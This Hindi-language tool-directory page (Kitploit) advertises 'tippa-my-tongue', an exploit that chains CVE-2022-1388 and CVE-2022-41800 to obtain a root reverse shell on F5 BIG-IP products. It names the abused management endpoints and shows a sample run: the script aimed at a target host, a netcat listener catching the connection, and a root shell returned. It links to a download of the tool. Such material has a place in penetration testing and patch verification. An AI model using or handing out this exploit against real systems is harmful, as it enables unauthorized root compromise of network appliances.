Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
tippa-my-tongue — F5 BIG-IP एक्सप्लॉइट: CVE-2022-1388 और CVE-2022-41800 का उपयोग करके | Kitploit
उपकरण/GitHubGitHub/j-baines/tippa-my-tongue
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubj-baines/tippa-my-tongue

tippa-my-tongue

F5 BIG-IP एक्सप्लॉइट: CVE-2022-1388 और CVE-2022-41800 का उपयोग करके

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Tippa My Tongue

Tippa My Tongue एक एक्सप्लॉइट है जो CVE-2022-1388 और CVE-2022-41800 का उपयोग करके F5 BIG-IP उत्पादों पर root रिवर्स शेल स्थापित करता है। अधिकांश CVE-2022-1388 एक्सप्लॉइट /mgmt/tm/util/bash का उपयोग करके कोड निष्पादन प्राप्त करते हैं। हालाँकि, यह एक्सप्लॉइट /mgmt/shared/iapp/rpm-spec-creator और उसके बाद /mgmt/shared/iapp/build-package का उपयोग करता है। यह दृष्टिकोण सबसे पहले Ron Bowes द्वारा इस AttackerKB विश्लेषण में सुझाया गया था। हालाँकि, मेरी जानकारी के अनुसार, किसी ने भी CVE-2022-1388 एक्सप्लॉइट प्रकाशित नहीं किया जिसने ठीक ऐसा ही किया हो।

अधिक विवरण के लिए, VulnCheck राइटअप पढ़ें।

उपयोग उदाहरण:

root@kitploit:~
albinolobster@mournland:~/tippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194

   ▄▄▄▄▄▪   ▄▄▄· ▄▄▄· ▄▄▄·     • ▌ ▄ ·.  ▄· ▄
   •██  ██ ▐█ ▄█▐█ ▄█▐█ ▀█     ·██ ▐███▪▐█▪██
    ▐█.▪▐█· ██▀· ██▀·▄█▀▀█     ▐█ ▌▐▌▐█·▐█▌▐█▪
    ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌    ██ ██▌▐█▌ ▐█▀·.
    ▀▀▀ ▀▀▀.▀   .▀    ▀  ▀     ▀▀  █▪▀▀▀  ▀ •
         ▄▄▄▄▄       ▐ ▄  ▄▄ • ▄• ▄▌▄▄▄ .
         •██  ▪     •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·
          ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄
          ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌
          ▀▀▀  ▀█▄▀▪▀▀ █▪·▀▀▀▀  ▀▀▀  ▀▀▀

                 CVE-2022-1388
                 CVE-2022-41800

                       🦞

[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Sending initial request to rpm-spec-creator
[+] Sending exploit attempt request to build-package
Connection received on 10.9.49.191 47152
bash: no job control in this shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
pwd
/var/config/rest/node/tmp/BUILD
[@localhost:NO LICENSE:Standalone] BUILD # id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #

आभार

  • Ron Bowes: इन एंडपॉइंट्स की खोज करने और दुनिया के साथ साझा करने के लिए
  • RHCP: फंकी होने के लिए
टूल डाउनलोड करें